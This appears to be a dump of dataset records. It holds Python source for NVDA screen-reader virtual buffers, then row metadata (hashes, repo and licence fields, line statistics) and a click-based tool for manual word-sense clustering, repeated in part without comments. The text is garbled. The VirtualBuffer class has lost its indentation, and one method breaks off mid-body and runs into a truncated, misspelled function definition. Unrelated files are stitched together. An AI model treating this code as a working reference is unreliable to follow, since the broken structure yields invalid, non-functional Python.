    """An offset-based TextInfo over the content of a remote virtual buffer."""

    # Offsets one past the end of the buffer are not valid positions.
    allowMoveToOffsetPastEnd=False

    def _getControlFieldAttribs(self, docHandle, id):
        """Return the attributes of the enclosing control field with the given
        identifier.
        @raise LookupError: if no enclosing field matches.
        """
        info = self.copy()
        info.expand(textInfos.UNIT_CHARACTER)
        # Walk the enclosing control fields from innermost to outermost.
        for field in reversed(info.getTextWithFields()):
            if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
                continue
            attrs = field.field
            if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
                return attrs
        raise LookupError

    def _getFieldIdentifierFromOffset(self, offset):
        """Return the (docHandle, ID) of the control field node at offset."""
        startOffset = ctypes.c_int()
        endOffset = ctypes.c_int()
        docHandle = ctypes.c_int()
        ID = ctypes.c_int()
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
        if not any((docHandle.value, ID.value)):
            raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
        return docHandle.value, ID.value

    def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
        """Return the (start, end) buffer offsets of the field with the given identifier.
        @raise LookupError: if the buffer holds no such node.
        """
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
        if not node:
            raise LookupError
        start = ctypes.c_int()
        end = ctypes.c_int()
        NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
        return start.value, end.value

    def _getBoundingRectFromOffset(self,offset):
        """Return the on-screen location of the NVDAObject at offset.
        @raise LookupError: if there is no object or it has no usable location.
        """
        o = self._getNVDAObjectFromOffset(offset)
        if not o:
            raise LookupError("no NVDAObject at offset %d" % offset)
        if o.hasIrrelevantLocation:
            raise LookupError("Object is off screen, invisible or has no location")
        return o.location

    def _getNVDAObjectFromOffset(self,offset):
        # Resolve the field at offset back to its NVDAObject; None on failure.
        try:
            docHandle,ID=self._getFieldIdentifierFromOffset(offset)
        except LookupError:
            log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
            return None
        return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)

    def _getOffsetsFromNVDAObjectInBuffer(self,obj):
        # Map an NVDAObject rendered in this buffer to its buffer offsets.
        docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
        return self._getOffsetsFromFieldIdentifier(docHandle,ID)

    def _getOffsetsFromNVDAObject(self, obj):
        """Like L{_getOffsetsFromNVDAObjectInBuffer}, but falls back to suitable
        ancestors for descendants that aren't rendered into the buffer."""
        while True:
            try:
                return self._getOffsetsFromNVDAObjectInBuffer(obj)
            except LookupError:
                pass
            # Interactive list/combo box/tree view descendants aren't rendered
            # into the buffer, even though they are still considered part of it.
            obj = obj.parent
            if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
                break
        raise LookupError

    def __init__(self,obj,position):
        # obj is the owning VirtualBuffer; needed before the base initialiser runs.
        self.obj=obj
        super(VirtualBufferTextInfo,self).__init__(obj,position)

    def _getSelectionOffsets(self):
        start=ctypes.c_int()
        end=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
        return start.value,end.value

    def _setSelectionOffsets(self,start,end):
        NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)

    def _getCaretOffset(self):
        # The caret is modelled as the start of the buffer's selection.
        return self._getSelectionOffsets()[0]

    def _setCaretOffset(self,offset):
        # A zero-length selection places the caret.
        return self._setSelectionOffsets(offset,offset)

    def _getStoryLength(self):
        return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)

    def _getTextRange(self,start,end):
        if start==end:
            return u""
        # The remote call may return None; normalise that to an empty string.
        return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""

    def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
        """Return the placeholder attribute when the control field has no
        content (empty or a single space); None when the field has content."""
        placeholder = attrs.get(placeholderAttrsKey)
        if not placeholder:
            return None
        try:
            start, end = self._getOffsetsFromFieldIdentifier(
                int(attrs.get('controlIdentifier_docHandle')),
                int(attrs.get('controlIdentifier_ID')))
        except (LookupError, ValueError):
            log.debugWarning("unable to get offsets used to fetch content")
            return placeholder
        else:
            valueLen = end - start
            if not valueLen:
                # Value is empty; use the placeholder.
                return placeholder
            # Only fetch the text when it is short enough to possibly be a
            # single space, to avoid pulling a large amount of content.
            if valueLen < 2:
                controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
                if not controlFieldText or controlFieldText == ' ':
                    return placeholder
        return None

    def _getFieldsInRange(self,start,end):
        """Fetch text plus field commands between two offsets, normalising
        each field's attributes."""
        text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
        if not text:
            return ""
        # The buffer serialises fields as XML; parse into strings and field commands.
        commandList=XMLFormatting.XMLTextParser().parse(text)
        for index in range(len(commandList)):
            if isinstance(commandList[index],textInfos.FieldCommand):
                field=commandList[index].field
                if isinstance(field,textInfos.ControlField):
                    commandList[index].field=self._normalizeControlField(field)
                elif isinstance(field,textInfos.FormatField):
                    commandList[index].field=self._normalizeFormatField(field)
        return commandList

    def getTextWithFields(self,formatConfig=None):
        start=self._startOffset
        end=self._endOffset
        if start==end:
            return ""
        return self._getFieldsInRange(start,end)

    def _getWordOffsets(self,offset):
        # Find the current field's range (line offsets without screen layout)
        # and clamp the word to it so a word never spans a field boundary.
        lineStart=ctypes.c_int()
        lineEnd=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
        word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
        return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))

    def _getLineOffsets(self,offset):
        # Line boundaries honour the user's max line length and screen layout settings.
        lineStart=ctypes.c_int()
        lineEnd=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
        return lineStart.value,lineEnd.value

    def _getParagraphOffsets(self,offset):
        # A paragraph is an unbounded line with screen layout forced on.
        lineStart=ctypes.c_int()
        lineEnd=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
        return lineStart.value,lineEnd.value

    def _normalizeControlField(self,attrs):
        """Convert a raw control field's string attributes into typed values and
        derive extra attributes (table header text, uniqueID)."""
        tableLayout=attrs.get('table-layout')
        if tableLayout:
            attrs['table-layout']=tableLayout=="1"
        # Convert some table attributes to ints.
        for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
            attrVal=attrs.get(attr)
            if attrVal is not None:
                attrs[attr]=int(attrVal)
        isHidden=attrs.get('isHidden')
        if isHidden:
            attrs['isHidden']=isHidden=="1"
        # Resolve table row/column header cell identifiers to their text.
        for axis in "row", "column":
            attr = attrs.pop("table-%sheadercells" % axis, None)
            if not attr:
                continue
            # Identifiers are serialised as "docHandle,ID" pairs separated by ";".
            cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
            textList = []
            for docHandle, ID in cellIdentifiers:
                try:
                    start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
                except (LookupError, ValueError):
                    continue
                textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
            attrs["table-%sheadertext" % axis] = "\n".join(textList)
        if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
            attrs['alwaysReportName'] = True
        # Expose a unique ID on the controlField for quick and safe comparison,
        # built from the virtualBuffer field's docHandle and ID.
        docHandle=attrs.get('controlIdentifier_docHandle')
        ID=attrs.get('controlIdentifier_ID')
        if docHandle is not None and ID is not None:
            attrs['uniqueID']=(docHandle,ID)
        return attrs

    def _normalizeFormatField(self, attrs):
        # Convert the stripped-chars count from its string form to an int, in place.
        strippedCharsFromStart = attrs.get("strippedCharsFromStart")
        if strippedCharsFromStart is not None:
            assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
            attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
        return attrs

    def _getLineNumFromOffset(self, offset):
        # Line numbers are not exposed by virtual buffers.
        return None

    def _get_fieldIdentifierAtStart(self):
        # (docHandle, ID) of the control field at the start of this range.
        return self._getFieldIdentifierFromOffset( self._startOffset)

    def _getUnitOffsets(self, unit, offset):
        """Resolve virtual-buffer-specific units (control field / format field)
        to offsets; defer any other unit to the base class."""
        if unit == textInfos.UNIT_CONTROLFIELD:
            startOffset=ctypes.c_int()
            endOffset=ctypes.c_int()
            docHandle=ctypes.c_int()
            ID=ctypes.c_int()
            node=VBufRemote_nodeHandle_t()
            NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
            return startOffset.value,endOffset.value
        elif unit == textInfos.UNIT_FORMATFIELD:
            startOffset=ctypes.c_int()
            endOffset=ctypes.c_int()
            node=VBufRemote_nodeHandle_t()
            NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
            return startOffset.value,endOffset.value
        return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)

    def _get_clipboardText(self):
        # Blocks should start on a new line but don't necessarily carry an
        # end-of-line indicator.
        # Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
        blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
        return "\r\n".join(blocks)

    def activate(self):
        # Delegate activation (e.g. following a link) to the owning buffer.
        self.obj._activatePosition(info=self)

    def getMathMl(self, field):
        """Fetch the MathML markup for a math control field via its NVDAObject."""
        docHandle = int(field["controlIdentifier_docHandle"])
        nodeId = int(field["controlIdentifier_ID"])
        obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
        return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
def prepare(self):
if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
# So at very least don't try to prepare a virtualBuffer as it will fail.
log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
return
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
super(VirtualBuffer,self).terminate()
if not self.VBufHandle:
return
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(
name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
target=self._loadBuffer).start(
)
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
self.rootNVDAObject.appModule.helperLocalBindingHandle,
self.rootDocHandle,self.rootID,
self.backendName
)
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
ui.message(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self, obj):
    """Return the 'table-layout' value for the table containing obj.

    Returns False when obj is not inside a table; may return None when neither
    obj's field nor the table element exposes a 'table-layout' attribute.
    """
    docHandle, ID = self.getIdentifierFromNVDAObject(obj)
    ID = str(ID)
    info = self.makeTextInfo(obj)
    info.collapse()
    info.expand(textInfos.UNIT_CHARACTER)
    fieldCommands = [x for x in info.getTextWithFields() if isinstance(x, textInfos.FieldCommand)]
    tableLayout = None
    tableID = None
    # First pass: find obj's own control field; read its layout flag, or the
    # id of the table that contains it.
    for fieldCommand in fieldCommands:
        fieldID = fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
        if fieldID == ID:
            tableLayout = fieldCommand.field.get('table-layout')
            if tableLayout is not None:
                return tableLayout
            tableID = fieldCommand.field.get('table-id')
            break
    if tableID is None:
        return False
    # Second pass: read the layout flag from the table element itself.
    for fieldCommand in fieldCommands:
        fieldID = fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
        if fieldID == tableID:
            tableLayout = fieldCommand.field.get('table-layout', False)
            break
    return tableLayout
@abstractmethod
def getNVDAObjectFromIdentifier(self, docHandle, ID):
    """Return the NVDAObject identified by (docHandle, ID); subclasses must implement."""
    raise NotImplementedError
@abstractmethod
def getIdentifierFromNVDAObject(self, obj):
    """Return the (docHandle, ID) pair identifying obj; subclasses must implement."""
    raise NotImplementedError
def script_refreshBuffer(self, gesture):
    """Rebuild the virtual buffer from scratch (bound to a user gesture)."""
    if scriptHandler.isScriptWaiting():
        # This script may cause subsequently queued scripts to fail, so don't execute.
        return
    self.unloadBuffer()
    self.loadBuffer()
# User-visible description attached as the script's doc string.
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self, gesture):
    """Flip the user's "use screen layout" preference and announce the new state."""
    newValue = not config.conf["virtualBuffers"]["useScreenLayout"]
    config.conf["virtualBuffers"]["useScreenLayout"] = newValue
    if newValue:
        ui.message(_("Use screen layout on"))
    else:
        ui.message(_("Use screen layout off"))
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self, nodeType):
    # Base implementation: no searchable attributes (returns None).
    # NOTE(review): _iterNodesByType below calls _searchableAttribsForNodeType
    # (different spelling) -- confirm which name subclasses actually override.
    pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def _getTableCellAt(self, tableID, startPos, row, column):
    """Return the textInfo for the cell at (row, column) in the given table.

    :raises LookupError: if no such cell exists.
    """
    # NOTE(review): startPos is accepted but not forwarded to _iterTableCells
    # -- confirm whether that is intended.
    try:
        return next(self._iterTableCells(tableID, row=row, column=column))
    except StopIteration:
        # Normalize "no match" into LookupError for callers.
        raise LookupError
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
    """Find the cell adjacent to (origRow, origCol) along axis in the given direction.

    :param movement: "next" or "previous".
    :param axis: "row" or "column".
    :raises LookupError: when no suitable cell exists.
    """
    destRow = origRow
    destCol = origCol
    if axis == "row":
        destRow += origRowSpan if movement == "next" else -1
    elif axis == "column":
        destCol += origColSpan if movement == "next" else -1
    if destCol < 1:
        # Optimisation: We're definitely at the edge of the column.
        raise LookupError
    # Optimisation: Try searching for exact destination coordinates.
    # This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
    try:
        return self._getTableCellAt(tableID, startPos, destRow, destCol)
    except LookupError:
        pass
    # Cells are grouped by row, so in most cases, we simply need to search in the right direction.
    for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
        _ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
        if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
            return info
        elif row > destRow and movement == "next":
            # Optimisation: We've gone forward past destRow, so we know we won't find the cell.
            # We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
            break
    if axis == "row" or (axis == "column" and movement == "previous"):
        # In most cases, there's nothing more to try.
        raise LookupError
    else:
        # We're moving forward by column.
        # In this case, there might be a cell on an earlier row which spans multiple rows.
        # Therefore, try searching backwards.
        for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
            _ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
            if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
                return info
        else:
            raise LookupError
def _isSuitableNotLinkBlock(self, textRange):
return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN
def getEnclosingContainerRange(self, textRange):
    """Return a textInfo spanning the innermost container (or landmark) around textRange, or None."""
    formatConfig = config.conf['documentFormatting'].copy()
    formatConfig.update({"reportBlockQuotes": True, "reportTables": True, "reportLists": True, "reportFrames": True})
    controlFields = []
    # Collect the controlStart fields that enclose the start of the range.
    for cmd in textRange.getTextWithFields():
        if not isinstance(cmd, textInfos.FieldCommand) or cmd.command != "controlStart":
            break
        controlFields.append(cmd.field)
    containerField = None
    # Pop from innermost outward until a container/landmark field is found.
    while controlFields:
        field = controlFields.pop()
        if field.getPresentationCategory(controlFields, formatConfig) == field.PRESCAT_CONTAINER or field.get("landmark"):
            containerField = field
            break
    if not containerField: return None
    docHandle = int(containerField['controlIdentifier_docHandle'])
    ID = int(containerField['controlIdentifier_ID'])
    offsets = textRange._getOffsetsFromFieldIdentifier(docHandle, ID)
    return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
    """Schedule an update for the live buffer rooted at (rootDocHandle, rootID).

    Unknown roots (no entry in cls.rootIdentifiers) are silently ignored.
    """
    try:
        queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
    except KeyError:
        pass
def _handleUpdate(self):
if not self.VBufHandle:
ontrolFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = str(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
def _isNVDAObjectInApplication_noWalk(self, obj):
    """Fast check whether obj is inside an embedded application.

    Returns True/False when determinable, or None when the caller must fall
    back to walking the ancestry.
    """
    # Defer to the base class's check first.
    inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
    if inApp is not None:
        return inApp
    try:
        docHandle, objId = self.getIdentifierFromNVDAObject(obj)
    except:
        log.debugWarning("getIdentifierFromNVDAObject failed. "
            "Object probably died while walking ancestors.", exc_info=True)
        return None
    node = VBufRemote_nodeHandle_t()
    if not self.VBufHandle:
        return None
    try:
        NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId, ctypes.byref(node))
    except WindowsError:
        return None
    if node:
        # The object has a node in this buffer, so it isn't in an embedded application.
        return False
    # Can't tell from here.
    return None
# Class-level gesture map binding keyboard shortcuts to the script_* methods above.
__gestures = {
    "kb:NVDA+f5": "refreshBuffer",
    "kb:NVDA+v": "toggleScreenLayout",
}
| true
| true
|
f718f706894e02a8cb3427d1bb25139c6ae58378
| 7,286
|
py
|
Python
|
man_clus.py
|
frankier/finn-sense-clust
|
9b76ee3bdacc9b039432674306650c6edb9da3bb
|
[
"Apache-2.0"
] | null | null | null |
man_clus.py
|
frankier/finn-sense-clust
|
9b76ee3bdacc9b039432674306650c6edb9da3bb
|
[
"Apache-2.0"
] | 2
|
2019-04-27T14:40:10.000Z
|
2019-08-21T15:43:19.000Z
|
man_clus.py
|
frankier/finn-sense-clust
|
9b76ee3bdacc9b039432674306650c6edb9da3bb
|
[
"Apache-2.0"
] | null | null | null |
from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
    # Root click group; subcommands below attach via @man_clus.command().
    pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
    """
    Generate unclustered words in OUT_DIR from word list WORDS
    """
    session = get_session()
    for word in words:
        # Input lines look like "lemma.Noun # freq" (see pick_words); keep lemma.pos.
        word_pos = word.split("#")[0].strip()
        word, pos = word_pos.split(".")
        assert pos == "Noun"
        with open(pjoin(out_dir, word_pos), "w") as outf:
            # Get Wiktionary results
            results = session.execute(select([
                word_sense.c.sense_id,
                word_sense.c.etymology_index,
                word_sense.c.sense,
                word_sense.c.extra,
            ]).select_from(joined).where(
                (headword.c.name == word) &
                (word_sense.c.pos == "Noun")
            ).order_by(word_sense.c.etymology_index)).fetchall()
            prev_ety = None
            for row in results:
                # Blank line separates different etymology groups.
                if prev_ety is not None and row["etymology_index"] != prev_ety:
                    outf.write("\n")
                outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
                prev_ety = row["etymology_index"]
            # Get WordNet results
            for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
                wordnets = {wn for wn, _ in lemma_objs}
                outf.write("\n")
                outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
    """
    Add table of frequencies to DB
    """
    session = get_session()
    # NOTE(review): `session()` suggests get_session() returns a factory, yet
    # `session` is passed directly to insert() below -- confirm which it is.
    metadata.create_all(session().get_bind().engine)
    with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
        for name, freq in name_freqs:
            insert(session, freqs, name=name, freq=freq)
    session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
    """
    Compile manually clustered words in files INFS to OUT as a gold csv ready
    for use by eval
    """
    # Header expected by the evaluation tooling.
    out.write("manann,ref\n")
    for path in infs:
        lemma = basename(path).split(".")[0]
        cluster_num = 1
        with open(path) as src:
            for raw in src:
                # A blank line separates clusters within a word's file.
                if not raw.strip():
                    cluster_num += 1
                    continue
                # Everything before '#' is the sense reference; the rest is a comment.
                ref = raw.split("#")[0].strip()
                out.write(f"{lemma}.{cluster_num:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
    """
    Expand a gold clustering CSV INF back into per-word files in OUT_DIR.
    """
    session = get_session()
    for lemma, grouping in gen_groupings(inf):
        with open(pjoin(out_dir, lemma), "w") as outf:
            first = True
            for group_num, synsets in grouping.items():
                # Blank line between groups, but not before the first one.
                if not first:
                    outf.write("\n")
                else:
                    first = False
                for synset in synsets:
                    outf.write(synset)
                    outf.write(" # ")
                    # WordNet refs get the synset definition; otherwise look up
                    # the Wiktionary sense text in the DB.
                    if is_wn_ref(synset):
                        sense = wordnet.of2ss(synset).definition()
                    else:
                        sense = session.execute(select([
                            word_sense.c.sense,
                        ]).select_from(joined).where(
                            (headword.c.name == lemma) &
                            (word_sense.c.sense_id == synset)
                        )).fetchone()["sense"]
                    tokens = word_tokenize(sense)
                    outf.write(" ".join(tokens))
                    outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):
    """
    Filter a gold CSV to filter non-WordNet rows
    """
    # Note: this command (deliberately) shadows the builtin `filter` within its body.
    assert inf.readline().strip() == "manann,ref"
    outf.write("manann,ref\n")
    if filter in ("wn", "wiki"):
        # Keep only WordNet refs ("wn") or only Wiktionary refs ("wiki").
        for line in inf:
            manann, ref = line.strip().split(",")
            if ((filter == "wn") and not is_wn_ref(ref)) or \
                    ((filter == "wiki") and is_wn_ref(ref)):
                continue
            outf.write(line)
    else:
        # "link" mode: pair WordNet rows with Wiktionary rows per lemma.
        groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
        for lemma, group in groups:
            wn_grp = []
            wiki_grp = []
            for tpl in group:
                # tpl[2] is presumably the sense reference -- confirm against split_line.
                if is_wn_ref(tpl[2]):
                    wn_grp.append(tpl)
                else:
                    wiki_grp.append(tpl)
            grp_idx = 1
            for _, f1, lid1 in wn_grp:
                for _, f2, lid2 in wiki_grp:
                    # Same frame id -> same cluster; otherwise distinct clusters.
                    if f1 == f2:
                        outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
                        outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
                    else:
                        outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
                        outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
                    # NOTE(review): indentation was lost in this copy; grp_idx may
                    # belong one level out -- confirm against the original source.
                    grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
    """
    Pick etymologically ambiguous nouns for creating manual clustering.
    """
    # NOTE(review): when LIMIT is omitted, click passes None, so the Python
    # default of 50 is never used and .limit(None) applies no limit -- confirm.
    query = select([
        headword.c.name,
        freqs.c.freq,
    ]).select_from(joined_freq).where(
        word_sense.c.etymology_index.isnot(None) &
        (word_sense.c.pos == "Noun") &
        word_sense.c.inflection_of_id.is_(None)
    ).group_by(
        headword.c.id
    ).having(
        # Keep only headwords with more than one distinct etymology.
        count(
            distinct(word_sense.c.etymology_index)
        ) > 1
    ).order_by(freqs.c.freq.desc()).limit(limit)
    session = get_session()
    candidates = session.execute(query).fetchall()
    for word, freq in candidates:
        print(word + ".Noun", "#", freq)
    if verbose:
        print("\n")
        # Dump every sense of each candidate for manual inspection.
        for word, _ in candidates:
            print("#", word)
            pprint(session.execute(select([
                word_sense.c.sense_id,
                word_sense.c.sense,
            ]).select_from(joined).where(
                headword.c.name == word
            )).fetchall())
# Allow running this module directly as a CLI script.
if __name__ == "__main__":
    man_clus()
| 35.198068
| 131
| 0.549684
|
from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
